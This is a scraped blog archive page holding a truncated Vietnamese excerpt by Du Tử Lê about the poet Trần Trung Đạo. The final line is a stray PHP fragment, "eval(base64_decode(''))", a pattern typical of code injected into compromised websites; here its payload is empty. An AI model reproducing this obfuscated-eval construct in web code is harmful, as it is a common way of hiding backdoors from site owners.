Archive for June 27th, 2013

Du Tử Lê: Trần Trung Đạo và niềm tin dành cho thi ca

Du Tử Lê: Trần Trung Đạo và niềm tin dành cho thi ca

Du Tử LêTrong số những người chỉ thực sự cầm bút từ sau biến cố tháng 4-1975, do Biển Đông đem lại cho sinh hoạt VHTN của chúng ta ở quê người, tôi chú ý nhiều tới nhà thơ Trần Trung Đạo. Căn cứ theo một bài viết của tác giả Hà

06.27.2013 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>